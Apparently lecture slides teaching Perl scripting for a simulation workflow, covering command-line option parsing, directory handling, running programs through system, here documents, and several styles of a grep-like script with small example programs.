    Perl has a special function for parsing command-line arguments:
    use Getopt::Long;   # load module with GetOptions function
    GetOptions("m=f" => \$m, "b=f" => \$b, "c=f" => \$c,
               "func=s" => \$func, "A=f" => \$A, "w=f" => \$w,
               "y0=f" => \$y0, "tstop=f" => \$tstop,
               "dt=f" => \$dt, "case=s" => \$case,
               "screenplot!" => \$screenplot);
    # explanations:
    "m=f" => \$m     
    # command-line option --m or -m requires a float (f) 
    # value, e.g., -m 5.1 sets $m to 5.1
    
    "func=s" => \$func
    #  --func string (result in $func)
    
    "screenplot!" => \$screenplot
    # --screenplot turns $screenplot on,
    # --noscreenplot turns $screenplot off
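
    A reduced, self-contained sketch of the same idea with three of the options. The command line is simulated by assigning to @ARGV, and the option values are made up. The case name is a string and therefore uses the s type. GetOptions returns false if parsing fails, so its return value can be tested.

```perl
use strict;
use warnings;
use Getopt::Long;

my ($m, $case, $screenplot) = (1.0, "tmp1", 1);   # defaults

# Simulate: script.pl -m 3.2 --case run1 --noscreenplot
@ARGV = ("-m", "3.2", "--case", "run1", "--noscreenplot");

GetOptions("m=f"         => \$m,
           "case=s"      => \$case,
           "screenplot!" => \$screenplot)
    or die "error in command-line arguments\n";

print "m=$m case=$case screenplot=$screenplot\n";
```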
    



    Creating a subdirectory

    Perl has a rich cross-platform operating system interface
    Safe, cross-platform creation of a subdirectory:
    $dir = $case;
    use File::Path;    # contains the rmtree function
    if (-d $dir) {     # does $dir exist?
        rmtree($dir);  # remove directory
        print "deleting directory $dir\n";
    }
    mkdir($dir, 0755) 
          or die "Could not create $dir; $!\n"; 
    chdir($dir)       
          or die "Could not move to $dir; $!\n";
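
    The remove-then-create logic can be tried safely inside a throwaway parent directory. This is only a sketch: the use of File::Temp and File::Spec and the case name run1 are assumptions made for the demonstration, and the loop runs twice so that the removal branch is exercised on the second pass.

```perl
use strict;
use warnings;
use File::Path qw(rmtree);
use File::Temp qw(tempdir);
use File::Spec;

# Work inside a throwaway parent directory so nothing real is deleted.
my $parent = tempdir(CLEANUP => 1);
my $dir    = File::Spec->catdir($parent, "run1");   # hypothetical case name

for my $pass (1, 2) {          # the second pass exercises the removal branch
    if (-d $dir) {
        print "deleting directory $dir\n";
        rmtree($dir);
    }
    mkdir($dir, 0755) or die "Could not create $dir; $!\n";
}
my $exists = -d $dir ? 1 : 0;
print "directory exists: $exists\n";
```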
    



    Writing the input file to the simulator

    open(F,">$case.i") or die "open error; $!\n";
    print F "
            $m
            $b
            $c
            $func
            $A
            $w
            $y0
            $tstop
            $dt
    ";
    close(F);
    
    Double-quoted strings can be used for multi-line output



    Running the simulation

    Stand-alone programs can be run as
    system "$cmd";  # $cmd is the command to be run
    
    # examples:
    system "myprog < input_file";
    system "ls *.ps";  # valid, but bad - Unix-specific
    
    Safe execution of our simulator:
    $cmd = "oscillator < $case.i";
    $failure = system($cmd);
    die "running the oscillator code failed\n" if $failure;
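
    The value returned by system is the wait status of the command, not its exit code. The sketch below shows how the two are related; it runs the Perl interpreter itself (through $^X) as the child program, which is an assumption made only so that the example does not depend on the oscillator code being installed.

```perl
use strict;
use warnings;

# $^X is the path of the running perl, so no external program is assumed.
my $failure = system($^X, "-e", "exit 3");

my $exit_code = $failure >> 8;     # exit status of the child
my $signal    = $failure & 127;    # signal number, 0 if none

print "raw status: $failure, exit code: $exit_code, signal: $signal\n";
```

    A zero return value means success, which is why the test "if $failure" works.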
    



    Making plots

    Make Gnuplot script:
    open(F, ">$case.gnuplot");
    # print multiple lines using a "here document"
    print F <<EOF; 
    set title '$case: m=$m b=$b c=$c f(y)=$func ...';
    ...
    EOF
    close(F);
    
    Run Gnuplot:
    $cmd = "gnuplot -geometry 800x200 -persist $case.gnuplot";
    $failure = system($cmd);
    die "running gnuplot failed\n" if $failure;
    



    Multi-line output in Perl

    Double-quoted strings:
    print "\
    Here is some multi-line text
    with a variable $myvar inserted.
    Newlines are preserved.
    ";
    
    'Here document':
    print FILE <<EOF;
    Here is some multi-line text
    with a variable $myvar inserted.
    Newlines are preserved.
    EOF
    
    Note: final EOF must start in 1st column!
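
    Whether variables are interpolated in a here document depends on how the terminator is quoted. A short sketch with a made-up variable value; the here documents are assigned to variables instead of printed to a file so the result can be inspected.

```perl
use strict;
use warnings;

my $myvar = 42;

# Unquoted (or double-quoted) terminator: variables are interpolated.
my $interpolated = <<EOF;
value: $myvar
EOF

# Single-quoted terminator: the text is taken literally.
my $literal = <<'EOF';
value: $myvar
EOF

print $interpolated;   # value: 42
print $literal;        # value: $myvar
```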



    About Perl syntax

    Perl's built-in functions can be called without parentheses:
    open(F, "<$somefile");   # with parentheses
    open F, "<$somefile";    # without parentheses
    
    More examples:
    printf F "%5d: %g\n", $i, $result;
    system "./myapp -f 0";
    
    If-like tests can follow the action:
    printf F "%5d: %g\n", $i, $result unless $counter > 0;
    
    # equivalent C-like syntax:
    if (!($counter > 0)) {
        printf(F "%5d: %g\n", $i, $result);
    }
    
    This Perl syntax can make scripts easier to read
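
    A sketch comparing the trailing unless form with the block form. The counter values are made up. The negation in the block form needs its own parentheses, since ! binds more tightly than >.

```perl
use strict;
use warnings;

my @log;
for my $counter (-1, 0, 1) {
    # statement modifier: action first, test last
    push @log, "modifier: counter=$counter" unless $counter > 0;

    # the same test in block form; the parentheses matter because
    # ! binds more tightly than >
    if (!($counter > 0)) {
        push @log, "block: counter=$counter";
    }
}
print "$_\n" for @log;
```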



    TIMTOWTDI

    = There Is More Than One Way To Do It
    TIMTOWTDI is a Perl philosophy
    These notes: emphasis on one verbose (easy-to-read) way to do it
    Nevertheless, you need to know several Perl programming styles to understand other people's code!
    Example of TIMTOWTDI: a Perl grep program



    The grep utility on Unix

    Suppose you want to find all lines in a C file containing the string superLibFunc
    Unix grep is handy for this purpose:
    grep superLibFunc myfile.c
    
    prints the lines containing superLibFunc
    Can also search for text patterns (regular expressions)



    TIMTOWTDI: Perl grep

    Experienced Perl programmer:
    $string = shift;
    while (<>) { print if /$string/o; }
    
    Lazy Perl user:
    perl -n -e 'print if /superLibFunc/;' file1 file2 file3
    
    Eh, Perl has a grep function...
    $string = shift; 
    print grep /$string/, <>;
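
    Perl's grep function is itself context sensitive. In this sketch the lines come from a made-up array instead of a file: in list context grep returns the matching elements, in scalar context the number of matches.

```perl
use strict;
use warnings;

my @lines = ("int superLibFunc(int x);\n",
             "int other(void);\n",
             "y = superLibFunc(3);\n");
my $string = "superLibFunc";

my @hits  = grep { /$string/ } @lines;   # list context: matching elements
my $count = grep { /$string/ } @lines;   # scalar context: number of matches

print @hits;
print "matches: $count\n";
```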
    
    Confused? Next slide is for the novice



    Perl grep for the novice

    #!/usr/bin/perl
    die "Usage: $0 string file1 file2 ...\n" if $#ARGV < 1;
    
    # first command-line argument is the string to search for:
    $string = shift @ARGV;  # = $ARGV[0];
    
    # run through the next command-line arguments,
    # i.e. run through all files, load the file and grep:
    
    while (@ARGV) {
        $file = shift @ARGV;
        if (-f $file) {
            open(FILE,"<$file");
            @lines = <FILE>;  # read all lines into a list
    
            foreach $line (@lines) {
                # check if $line contains the string $string:
                if ($line =~ /$string/) {  # regex match?
                    print "$file: $line";
                }
            }
        }
    }
    



    Dollar underscore

    Lazy Perl programmers make use of the implicit underscore variable:
    foreach (@files) {
        if (-f) {
            open(FILE,"<$_");
            foreach (<FILE>) {
                if (/$string/) {
                    print;
                }}}}
    
    The fully equivalent code is
    foreach $_(@files) {
        if (-f $_) {
            open(FILE,"<$_");
            foreach $_(<FILE>) {
                if ($_ =~ /$string/) {
                    print $_;
                }}}}
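
    A further property of $_ in a foreach loop is that it is an alias for the current element, not a copy. The sketch below uses a made-up word list to show both the implicit use in a pattern match and the effect of assigning to $_.

```perl
use strict;
use warnings;

my @words = ("alpha", "beta", "gamma");
my @with_m;
foreach (@words) {           # each element is aliased to $_
    next unless /m/;         # same as: next unless $_ =~ /m/;
    push @with_m, $_;
}
# Because $_ is an alias, modifying it changes the array itself.
$_ = uc for @words;

print "@with_m\n";    # gamma
print "@words\n";     # ALPHA BETA GAMMA
```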
    



    More modern Perl style

    With use of dollar underscore:
    die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
    ($string, @files) = @ARGV;
    foreach (@files) {
        next unless -f; # jump to next loop pass
        open FILE, $_;
        foreach (<FILE>) { print if /$string/; }
    }
    
    Without dollar underscore:
    die "Usage: $0 pattern file1 file2 ...\n" unless @ARGV >= 2;
    ($string, @files) = @ARGV;
    foreach $file (@files) {
        next unless -f $file;  
        open FILE, $file;
        foreach $line (<FILE>) { 
           print $line if $line =~ /$string/;
        }}
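
    A stricter variant, offered as a sketch and not as the style used in these notes: it adds use strict and use warnings, a lexical filehandle, the three-argument form of open with an error check, and line-by-line reading. The function name grep_files and the temporary test file are assumptions made for the demonstration.

```perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Return all lines in @files that match $pattern.
sub grep_files {
    my ($pattern, @files) = @_;
    my @matches;
    foreach my $file (@files) {
        next unless -f $file;             # skip anything that is not a plain file
        open(my $fh, '<', $file) or die "Cannot open $file; $!\n";
        while (my $line = <$fh>) {        # read one line at a time
            push @matches, $line if $line =~ /$pattern/;
        }
        close($fh);
    }
    return @matches;
}

# Small demonstration on a temporary file.
my ($tmp, $tmpname) = tempfile(UNLINK => 1);
print $tmp "first line\nsuperLibFunc(1);\nlast line\n";
close($tmp);

my @found = grep_files("superLibFunc", $tmpname);
print @found;
```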